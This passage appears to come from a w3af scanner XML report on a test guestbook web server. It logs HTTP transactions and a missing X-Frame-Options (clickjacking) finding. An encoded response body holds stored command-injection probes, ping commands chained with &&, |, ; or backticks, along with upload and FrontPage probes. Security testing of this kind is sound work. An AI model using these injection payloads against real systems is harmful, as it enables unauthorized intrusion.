ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
JiZwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPlRocmVhZC5TbGVlcCgzMDAwKTs8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+VGhyZWFkLlNsZWVwKDMwMDApOzwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD4mJi91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsPC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnxwaW5nIC1uIDQg
bG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPnxwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnwvdXNyL3Ni
aW4vcGluZyAtcyBsb2NhbGg8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+O3BpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
O3BpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+Oy91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaDwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhv
c3RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+cGluZyAtYyA0IGxvY2FsaG9zdDwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vdXNyL3NiaW4v
cGluZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JiZwaW5nIC1jIDQgbG9j
YWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPiYmL3Vzci9zYmluL3BpbmcgLXMgbG9jYWxob3N0IDQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHBpbmcgLW4gNCBsb2NhbGhv
c3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+fHBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fC91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaG9zdCA0PC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjtw
aW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPjtwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjsvdXNyL3NiaW4vcGluZyAt
cyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhvc3Rg
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjwvcD4KICAgICAgICA8cD48L3A+CiAgICAgICAgPGhyIC8+Cg==
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[18, 50, 97, 101, 102, 126, 127, 162, 205, 206, 207, 208, 209, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 224, 225, 227, 228, 229, 230, 231, 232, 233, 234, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 250, 251, 258, 260, 261, 262, 264, 265, 266, 267, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 282, 290, 300, 309, 312, 313, 315, 316, 317, 318, 319, 320, 322, 323, 328, 331, 332, 333, 334, 336, 337, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 353, 354, 355, 356, 358, 364, 365, 366, 368, 369, 370, 371, 374, 389, 390, 413, 414, 416, 424, 428, 434, 454, 468, 483, 485, 487, 495, 517, 518, 519, 523, 524, 526, 527, 528, 529, 531, 535, 550, 560, 575, 657, 659, 668, 738, 756, 771, 795, 800, 828, 831, 841, 844, 849, 852, 856, 864, 869, 873, 875, 900, 901, 926, 928, 941, 944, 957, 960, 972, 974, 988, 989, 1003, 1004, 1017]" method="GET" name="Click-Jacking vulnerability" plugin="click_jacking" severity="Medium" url="None" var="None">
        <description>The whole target has no protection (X-Frame-Options header) against Click-Jacking attacks.</description>
        <long-description>Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

The server didn't return an `X-Frame-Options` header which means that this website could be at risk of a clickjacking attack. The `X-Frame-Options` HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.</long-description>
        <fix-guidance>Configure your web server to include an X-Frame-Options header.</fix-guidance>
        <fix-effort>50</fix-effort>
        <references>
            <reference title="RFC-7034" url="http://tools.ietf.org/html/rfc7034"/>
            <reference title="Mozilla developer network" url="https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options"/>
            <reference title="OWASP Clickjacking document" url="https://www.owasp.org/index.php/Clickjacking"/>
        </references>
        <http-transactions>
            <http-transaction id="18">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="50">
                <http-request>
                    <status>PUT http://10.12.68.43:31337/fGSzl HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">0gd1hq</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="97">
                <http-request>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="101">
                <http-request>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="102">
                <http-request>
                    <status>GET http://10.12.68.43:31337/tkcgs.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/tkcgs.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="126">
                <http-request>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L3RrY2dzLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGguc2dja3Q=
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="127">
                <http-request>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="162">
                <http-request>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
